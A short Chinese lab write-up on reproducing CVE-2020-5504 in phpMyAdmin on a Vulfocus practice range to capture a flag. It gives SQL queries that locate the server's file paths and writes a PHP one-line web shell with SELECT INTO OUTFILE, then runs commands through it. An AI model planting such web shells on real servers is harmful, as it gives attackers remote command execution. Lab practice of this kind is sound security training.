VULFOCUS靶场CVE-2020-5504漏洞复现拿flag

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

目录

前言

一、SQL查询

二、使用步骤

1.登陆靶场并进入phpmyadmin

总结


前言

提示:漏洞复现很简单,网上随便搜。本文主要是flag获取,里面用到的SQL select插入的数据以及判断网站绝对路径的方法。


提示:以下是本篇文章正文内容,下面案例可供参考

一、SQL查询

1、select @@datadir,得到的结果为数据库的路径

2、select @@basedri,mysql的安装路径

二、使用步骤

1.登陆靶场并进入phpmyadmin

VULFOCUS靶场CVE-2020-5504漏洞复现拿flag_第1张图片 进入SQL查询窗口

VULFOCUS靶场CVE-2020-5504漏洞复现拿flag_第2张图片

 通过第一标题中提到的两个查询语句:select @@datadir、select @@basedir,进一步判断网站绝对路径在/var下

VULFOCUS靶场CVE-2020-5504漏洞复现拿flag_第3张图片

VULFOCUS靶场CVE-2020-5504漏洞复现拿flag_第4张图片

最终通过SELECT load_file('/var/www/html/pma/index.php'),有返回数据大小,进而最终判断网站绝对路径为/var/www/html/pma

VULFOCUS靶场CVE-2020-5504漏洞复现拿flag_第5张图片

最终写入一句话木马

select '\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE '/var/www/html/pma/test.php'

VULFOCUS靶场CVE-2020-5504漏洞复现拿flag_第6张图片

最后连接http://x.x.x.x/pma/test.php?cmd=ls /tmp,得到flag

 


总结

复现很简单,唯一有难度的地方就在于怎么找网站的绝对路径,然后再写入一句话木马,谨以此文章记录一次flag的获取流程

你可能感兴趣的:(web安全)